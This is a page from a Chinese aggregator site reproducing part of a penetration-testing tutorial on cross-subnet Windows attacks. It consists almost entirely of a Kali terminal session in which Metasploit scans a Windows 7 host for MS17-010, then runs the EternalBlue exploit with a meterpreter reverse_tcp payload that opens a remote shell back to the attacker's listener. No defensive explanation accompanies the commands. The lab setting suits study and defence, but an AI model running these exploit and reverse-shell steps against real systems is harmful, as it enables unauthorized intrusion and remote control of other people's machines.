江苏龙网

  1. 主页 > 生活百科 > >

Windows网络服务渗透测试实战-跨网段攻击( 二 )

跨网段

Windows网络服务渗透测试实战-跨网段攻击
文章插图
 
┌──(kali?kali)-[~/Desktop]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:68:f4:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.43.89/24 brd 192.168.43.255 scope global dynamic noprefixroute eth0
valid_lft 2911sec preferred_lft 2911sec
inet6 240e:468:81:203c:da81:9549:e675:f2e0/64 scope global temporary dynamic
valid_lft 3538sec preferred_lft 3538sec
inet6 240e:468:81:203c:20c:29ff:fe68:f4d1/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 3538sec preferred_lft 3538sec
inet6 fe80::20c:29ff:fe68:f4d1/64 scope link noprefixroute
valid_lft forever preferred_lft forever
 
┌──(kali?kali)-[~/Desktop]
└─$ msfconsole
_ _
// __ _ __ /_/ __
| | / | ________ _____ | | /_
| | /| | | ___ |- -| / / __ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / - __| | | | __/| | | |_
|/ |____/ ___/ / \___/ / __| |_ ___
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Open an interactive Ruby terminal with
irb
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.43.99
rhosts => 192.168.43.99
msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 512
threads => 512
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.43.99
rhost => 192.168.43.99
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.43.89
lhost => 192.168.43.89
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
 
[*] Started reverse TCP handler on 192.168.43.89:4444
[*] 192.168.43.99:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.43.99:445 - The target is vulnerable.
[*] 192.168.43.99:445 - Connecting to target for exploitation.
[+] 192.168.43.99:445 - Connection established for exploitation.
[+] 192.168.43.99:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.43.99:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.43.99:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.43.99:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.43.99:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.43.99:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.43.99:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.43.99:445 - Sending all but last fragment of exploit packet
[*] 192.168.43.99:445 - Starting non-paged pool grooming
[+] 192.168.43.99:445 - Sending SMBv2 buffers
[+] 192.168.43.99:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.43.99:445 - Sending final SMBv2 buffers.
[*] 192.168.43.99:445 - Sending last fragment of exploit packet!
[*] 192.168.43.99:445 - Receiving response from exploit packet
[+] 192.168.43.99:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.43.99:445 - Sending egg to corrupted connection.
[*] 192.168.43.99:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.43.99
[*] Meterpreter session 1 opened (192.168.43.89:4444 -> 192.168.43.99:50762) at 2022-05-18 22:23:55 -0400
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


推荐阅读


上一篇:薛之谦与大张伟好像,大张伟是薛之谦吗-

下一篇:IT程序员喜欢Linux系统的原因有哪些?